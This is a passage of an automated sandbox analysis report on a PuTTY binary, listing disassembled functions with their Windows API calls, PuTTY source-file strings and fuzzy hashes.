                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Clipboard$Data$CloseMessageOpenSend
                            • String ID:
                            • API String ID: 2111581930-0
                            • Opcode ID: bee2f5490eb9ce96538574b04d71f22d84026a07e542f81de3d711be0a4561b8
                            • Instruction ID: 7a0e2718f5867bdbb93ad74b44e771202b378d31b80c994a23b6919ce1e6c93f
                            • Opcode Fuzzy Hash: bee2f5490eb9ce96538574b04d71f22d84026a07e542f81de3d711be0a4561b8
                            • Instruction Fuzzy Hash: 80E04F31249311AAF7301B70BD0AF673A9CBB04B42F004032BF01E91E6DAB5C8149A79
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00431219 Relevance: 7.0, Strings: 5, Instructions: 766COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID: !(i == our_curs_y && j == our_curs_x)$..\terminal.c$@$@$`
                            • API String ID: 0-1243757527
                            • Opcode ID: 7b7af070eb6655b46370d08e1c64e3dea5bdaa77c877164e9b72da63f4613a2a
                            • Instruction ID: b0b9c71d44da66f83b29f1798291cfd128640d5441f2a41c52ea14c490f23a4a
                            • Opcode Fuzzy Hash: 7b7af070eb6655b46370d08e1c64e3dea5bdaa77c877164e9b72da63f4613a2a
                            • Instruction Fuzzy Hash: 7C721A71E00609DFCB24CFA9C480AAEBBF1FF58314F14956AE455A73A1D738A981CF58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043F5AF Relevance: 6.0, APIs: 4, Instructions: 31windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: IconicTextWindow_strcat_strlen
                            • String ID:
                            • API String ID: 3044258180-0
                            • Opcode ID: 1efacd514311d1b46e33e878122cfd9694cf60f37f4b63d954c1bf47d9982e03
                            • Instruction ID: 8870b271564465d9390b2bc7c43a6a6860829acf6abd587b94c1c1d49860bd71
                            • Opcode Fuzzy Hash: 1efacd514311d1b46e33e878122cfd9694cf60f37f4b63d954c1bf47d9982e03
                            • Instruction Fuzzy Hash: 1EF03031909312BEDB212B32BC0AF5B3E5DEF05365B24443AFD08A51B2DB799854DA9C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043F60F Relevance: 6.0, APIs: 4, Instructions: 31windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: IconicTextWindow_strcat_strlen
                            • String ID:
                            • API String ID: 3044258180-0
                            • Opcode ID: 3de367654d153f0fee72e1a29e88b8457e0cf9f262e7467c9e253fb7e80188f6
                            • Instruction ID: 285c1cc5330c24e04cc69d3a2dc678eb98b0a0c19864efcf3eae4b8b6efc2576
                            • Opcode Fuzzy Hash: 3de367654d153f0fee72e1a29e88b8457e0cf9f262e7467c9e253fb7e80188f6
                            • Instruction Fuzzy Hash: 6BF0A930904300AEEB212B22BC0AF8B3E19EF04364B14443AF908A51B2DBB99844CA9C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043D666 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8d515654040908bfa7b5c2dac0c435a55bc2e858434d60fe346d155844840ee1
                            • Instruction ID: 2b91986adb94b83a3d07655932db3e303801b5a567237a181fffc1372874cb76
                            • Opcode Fuzzy Hash: 8d515654040908bfa7b5c2dac0c435a55bc2e858434d60fe346d155844840ee1
                            • Instruction Fuzzy Hash: C0F0EC31904109ABCF01AF75EC069AE3BA9BF08345F049026F82DD6171DB38DA569B69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041FE9B Relevance: 3.9, Strings: 3, Instructions: 195COMMON
                            Download Yara Rule
                            Strings
                            • ..\sshaes.c, xrefs: 0041FEBB, 0041FEE1
                            • keylen == 16 || keylen == 24 || keylen == 32, xrefs: 0041FEE6
                            • blocklen == 16 || blocklen == 24 || blocklen == 32, xrefs: 0041FEC0
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy
                            • String ID: ..\sshaes.c$blocklen == 16 || blocklen == 24 || blocklen == 32$keylen == 16 || keylen == 24 || keylen == 32
                            • API String ID: 3058806289-2664803400
                            • Opcode ID: 91f76b9de93aba96b3efc9820180f6b3da2173b4f6f8d63f95b4257f8810ca5f
                            • Instruction ID: e7bfad14ba9d184952e1e1946a314721028fbb87887949ef8f726ce860f398c4
                            • Opcode Fuzzy Hash: 91f76b9de93aba96b3efc9820180f6b3da2173b4f6f8d63f95b4257f8810ca5f
                            • Instruction Fuzzy Hash: 3F713C70B006909BEB198F69D4E42BDBBE1AB85305F1C41AFD496DB382D3789782CB15
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00440456 Relevance: 3.0, APIs: 2, Instructions: 14windowCOMMON
                            Download Yara Rule
                            APIs
                            • IsIconic.USER32(00435EBD), ref: 0044045C
                            • ShowWindow.USER32(00000006), ref: 00440480
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: IconicShowWindow
                            • String ID:
                            • API String ID: 3061500023-0
                            • Opcode ID: 0285cf9ce5a35cbf164b3408eb907e83ec6c6d7680e02e74263fe2eebfb7b380
                            • Instruction ID: a786cc0d30aeb2bfed0d47b41dfe5fee4c733daf78a7ccae78aba84c74c9ff36
                            • Opcode Fuzzy Hash: 0285cf9ce5a35cbf164b3408eb907e83ec6c6d7680e02e74263fe2eebfb7b380
                            • Instruction Fuzzy Hash: 45D09E34508302DAFF714F20EC087173EA1AB40782F14C93AA745511F5C7B994E4DA1A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004250FD Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy
                            • String ID: (len & 7) == 0$..\sshdes.c
                            • API String ID: 3058806289-2384998143
                            • Opcode ID: 8fc4884c044305dc187211cea22a524b7930495f083181d8a33a548e24267401
                            • Instruction ID: 0cd761f1b8826d08513454f7da2d91d9a542fd689f4bd978dcea94ed937cea74
                            • Opcode Fuzzy Hash: 8fc4884c044305dc187211cea22a524b7930495f083181d8a33a548e24267401
                            • Instruction Fuzzy Hash: E1410930B042579BCB18DBBC88905EFBBF1AF95200B64C16ED9D6E3342E5749909C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0042125E Relevance: 2.6, Strings: 2, Instructions: 105COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy
                            • String ID: (len & 7) == 0$..\sshblowf.c
                            • API String ID: 3058806289-2157365526
                            • Opcode ID: 8d4ba63a1de2902efd69fa975b5b5a7766fbac25f7da248e2e1f1ddc17a83b30
                            • Instruction ID: fa06c40aed5488884f675a2c2442bc32015051b5e8db4978bbc774582bf9a6dd
                            • Opcode Fuzzy Hash: 8d4ba63a1de2902efd69fa975b5b5a7766fbac25f7da248e2e1f1ddc17a83b30
                            • Instruction Fuzzy Hash: 8C31BF34A042989FCB24CB7C88904EEBFF19F95300B24C8ADE8DA97742D1349A45CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00420348 Relevance: 2.6, Strings: 2, Instructions: 103COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy
                            • String ID: (len & 15) == 0$..\sshaes.c
                            • API String ID: 3058806289-4253567812
                            • Opcode ID: 39c03802b4b139962ac18af30598b4db2484c33d0879b96a6138b1a2e24f915c
                            • Instruction ID: 5560cb8573177143c7b248a0e4f2c973140b386e89ef5fde31bc778f6cdda6fd
                            • Opcode Fuzzy Hash: 39c03802b4b139962ac18af30598b4db2484c33d0879b96a6138b1a2e24f915c
                            • Instruction Fuzzy Hash: 41316D72E04258ABDB00DBA89CC5ADFBBF9DF98304F58C096D980E7353D574AA05C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00420237 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy
                            • String ID: (len & 15) == 0$..\sshaes.c
                            • API String ID: 3058806289-4253567812
                            • Opcode ID: 39a2aec4a6f876aecef57f130de4d61eaecdb3bec2e79a3f5fb69e9add59cac8
                            • Instruction ID: 9cb18ac13ca3d937052d18ce0ae72096ce804e63e4fb5e78269a984e7b693336
                            • Opcode Fuzzy Hash: 39a2aec4a6f876aecef57f130de4d61eaecdb3bec2e79a3f5fb69e9add59cac8
                            • Instruction Fuzzy Hash: 93313A72A012489FDB10CF6DD8C59CEBBF5EF98304F2880ABD98197312D234A605CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00421160 Relevance: 2.6, Strings: 2, Instructions: 89COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy
                            • String ID: (len & 7) == 0$..\sshblowf.c
                            • API String ID: 3058806289-2157365526
                            • Opcode ID: b3813f663f5a1a42be7bcb743804f3b9a7391995b6df99efa3635f3cd2ac36b0
                            • Instruction ID: d4e2410c64245cf248ca789a7ba6db4b125ccfb951a5ed498094f94bf36dc636
                            • Opcode Fuzzy Hash: b3813f663f5a1a42be7bcb743804f3b9a7391995b6df99efa3635f3cd2ac36b0
                            • Instruction Fuzzy Hash: 4831A5306083959BDB1CCB6C80A54BEBFF19F95300B48C4AED8DB57382D5746904CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00420F7D Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy
                            • String ID: (len & 7) == 0$..\sshblowf.c
                            • API String ID: 3058806289-2157365526
                            • Opcode ID: 6e34624de4dcc7ae275da9368b840e7b6fdc17c102f74152e7305317c9238a73
                            • Instruction ID: 447d0adc11a55a4fc78706abd4f9bfd49139788a2d576f58e46ae354825880e7
                            • Opcode Fuzzy Hash: 6e34624de4dcc7ae275da9368b840e7b6fdc17c102f74152e7305317c9238a73
                            • Instruction Fuzzy Hash: 8631B2306083959BDB2CCB58C4A14FEBFF19F95300B48C4AED8DB57382D178AA04CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00424C79 Relevance: 2.6, Strings: 2, Instructions: 81COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy
                            • String ID: (len & 7) == 0$..\sshdes.c
                            • API String ID: 3058806289-2384998143
                            • Opcode ID: b57908f01f438b9567002f50d0854b1fab9aaf4f26a0a65fb0e902619aa97678
                            • Instruction ID: b988923e2a28fabb8b36c5cfd66673ddfe9988f75868161668a98fb33167be7d
                            • Opcode Fuzzy Hash: b57908f01f438b9567002f50d0854b1fab9aaf4f26a0a65fb0e902619aa97678
                            • Instruction Fuzzy Hash: E1210E30F087915BD72DCB3E48912ABFFE2AFC5200B54C56ED4EA93786D974A408C361
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0042A995 Relevance: 1.8, Strings: 1, Instructions: 549COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0
                            • API String ID: 0-4108050209
                            • Opcode ID: 1174b44c0ffb4cbce4371fd5b0015ca8b2343b9f7b4138c4f3070b2e06bba974
                            • Instruction ID: ddeeb02650ad62c0c015ac1f95b22953e0920b97248c58268754c6389f08c05a
                            • Opcode Fuzzy Hash: 1174b44c0ffb4cbce4371fd5b0015ca8b2343b9f7b4138c4f3070b2e06bba974
                            • Instruction Fuzzy Hash: 88121273E016299BEB40CE8ACC8059DF7B3AFCC714B6B8255C954AB315CAB16D13DAC4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044A49B Relevance: 1.5, APIs: 1, Instructions: 41timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetLocalTime.KERNEL32(00408E81,?,?,?,?,?,?,?,?,004090C6,00408E81,00000000,0043D0FD,00000000,00408E81,0043D0FD), ref: 0044A4A5
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: LocalTime
                            • String ID:
                            • API String ID: 481472006-0
                            • Opcode ID: 9b6a6f31c472e80fe0936be739a937f6ab700674785b2961b27584579ba31337
                            • Instruction ID: 626f7b470001cebec97681173cf9fec6dc4fffe566e0104071bdd1987e39418b
                            • Opcode Fuzzy Hash: 9b6a6f31c472e80fe0936be739a937f6ab700674785b2961b27584579ba31337
                            • Instruction Fuzzy Hash: C001D375D01228AEDF50DFE9D9442FEBBF4BB08712F10012AE951F2280E3788A84DB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00446368 Relevance: 1.5, APIs: 1, Instructions: 37comCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.OLE32(0046C8B4,00000000,00000001,0046C904,00410EAC,00410EAC,?,00410EAC,?,?,?), ref: 0044631A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CreateInstance
                            • String ID:
                            • API String ID: 542301482-0
                            • Opcode ID: 65d908ce69fc7afbbb07a0aae355a21bf4734d3add0ac4ed41daff30d411855a
                            • Instruction ID: 11e1bc9725f136e68bba1cb60a6f2ef34096cadb4caf453c060c56412b946243
                            • Opcode Fuzzy Hash: 65d908ce69fc7afbbb07a0aae355a21bf4734d3add0ac4ed41daff30d411855a
                            • Instruction Fuzzy Hash: F6F09030244344EBEB14DF90CD49F2937A9AB42719F60006BF805D72A1E678ED85DA0F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00448111 Relevance: 1.5, APIs: 1, Instructions: 27networkCOMMON
                            Download Yara Rule
                            APIs
                            • recv.WS2_32(?,00000001,00000001,00000002), ref: 00448144
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: recv
                            • String ID:
                            • API String ID: 1507349165-0
                            • Opcode ID: 1e3e2e20267913357749b9c52b004b248e4a8e32dc657b820fb32351411d73c1
                            • Instruction ID: 192e91540a9a6be75b5ed166a2cc6303bacea28c093635082a62c6b7bc9fabc6
                            • Opcode Fuzzy Hash: 1e3e2e20267913357749b9c52b004b248e4a8e32dc657b820fb32351411d73c1
                            • Instruction Fuzzy Hash: E1F03031100705AFEB209F15D846B5673E8AB08721F10452FF54995590D775E8C18B48
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004557F0 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 00455810
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: InfoLocale
                            • String ID:
                            • API String ID: 2299586839-0
                            • Opcode ID: e44efea71dfc90e1b967a31170035ca24474a19816daf72572bc8b3d79856c1c
